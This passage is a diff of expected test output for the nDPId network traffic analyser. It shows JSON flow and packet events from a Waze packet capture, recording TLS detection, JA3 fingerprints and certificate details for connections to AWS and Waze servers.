ST=California, L=Mountain View, O=Google Inc, CN=*.waze.com","fingerprint":"A9:35:F0:16:17:A3:FD:73:EC:0C:03:24:F8:34:5A:8A:B3:D7:8D:57"}} 
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587878215,"flow_last_seen":1435587878215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587878215,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1435587878215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587878215,"pkt":"ABoRAAACABoRAAABCABFAAA8EZdAAEAGeDAKCAABNBFy25htAbtopH5VAAAAAKAC\/\/+mHQAAAgQFtAQCCAoACG\/CAAAAAAEDAwg="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1435587878217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878217,"pkt":"ABoRAAACABoRAAABCABFAAAodRhAABAGRMM0EXLbCggAAQG7mG2XW4GqaKR+VlAS\/\/9ktAAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1435587878217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878217,"pkt":"ABoRAAACABoRAAABCABFAAAoEZhAAEAGeEMKCAABNBFy25htAbtopH5Wl1uBq1AQ\/\/9ktQAA"} 
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878215,"flow_last_seen":1435587878444,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878444,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878215,"flow_last_seen":1435587878444,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878444,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587878606,"flow_last_seen":1435587878606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587878606,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1435587878606,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587878606,"pkt":"ABoRAAACABoRAAABCABFAAA8DkFAAEAGt5sKCAABsCK6tI3YAbvsnGGoAAAAAKAC\/\/+FVQAAAgQFtAQCCAoACG\/pAAAAAAEDAwg="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1435587878608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878608,"pkt":"ABoRAAACABoRAAABCABFAAAodR5AABAGgNKwIrq0CggAAQG7jdgTY55X7JxhqVAS\/\/+rXgAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1435587878609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878609,"pkt":"ABoRAAACABoRAAABCABFAAAoDkJAAEAGt64KCAABsCK6tI3YAbvsnGGpE2OeWFAQ\/\/+rXwAA"} 
-00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878215,"flow_last_seen":1435587878781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587878781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878215,"flow_last_seen":1435587878832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2123,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587878832,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878606,"flow_last_seen":1435587878901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878901,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878215,"flow_last_seen":1435587878781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587878781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878215,"flow_last_seen":1435587878832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2123,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587878832,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878606,"flow_last_seen":1435587878901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878901,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587879018,"flow_last_seen":1435587879018,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587879018,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1435587879018,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587879018,"pkt":"ABoRAAACABoRAAABCABFAAA8CjxAAEAGu6AKCAABsCK6tI3aAbtwD3ouAAAAAKAC\/\/\/pMQAAAgQFtAQCCAoACHASAAAAAAEDAwg="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1435587879020,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879020,"pkt":"ABoRAAACABoRAAABCABFAAAodSNAABAGgM2wIrq0CggAAQG7jdqP8IXRcA96L1AS\/\/+rXAAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1435587879020,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879020,"pkt":"ABoRAAACABoRAAABCABFAAAoCj1AAEAGu7MKCAABsCK6tI3aAbtwD3ovj\/CF0lAQ\/\/+rXQAA"} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878606,"flow_last_seen":1435587879181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879181,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete 
TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878606,"flow_last_seen":1435587879233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879233,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
-00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879018,"flow_last_seen":1435587879574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879574,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878606,"flow_last_seen":1435587879181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879181,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} 
+01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878606,"flow_last_seen":1435587879233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879233,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879018,"flow_last_seen":1435587879574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879574,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587879850,"flow_last_seen":1435587879850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587879850,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1435587879850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587879850,"pkt":"ABoRAAACABoRAAABCABFAAA8Fw9AAEAGrs0KCAABsCK6tI3cAbueIGdrAAAAAKAC\/\/\/NjwAAAgQFtAQCCAoACHBkAAAAAAEDAwg="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1435587879852,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879852,"pkt":"ABoRAAACABoRAAABCABFAAAodS5AABAGgMKwIrq0CggAAQG7jdxh35iUniBnbFAS\/\/+rWgAA"} 
00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1435587879853,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879853,"pkt":"ABoRAAACABoRAAABCABFAAAoFxBAAEAGruAKCAABsCK6tI3cAbueIGdsYd+YlVAQ\/\/+rWwAA"} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":396,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879018,"flow_last_seen":1435587879855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879855,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} 
-01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587879018,"flow_last_seen":1435587879907,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879907,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879850,"flow_last_seen":1435587879958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879958,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":428,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879850,"flow_last_seen":1435587880568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587880568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 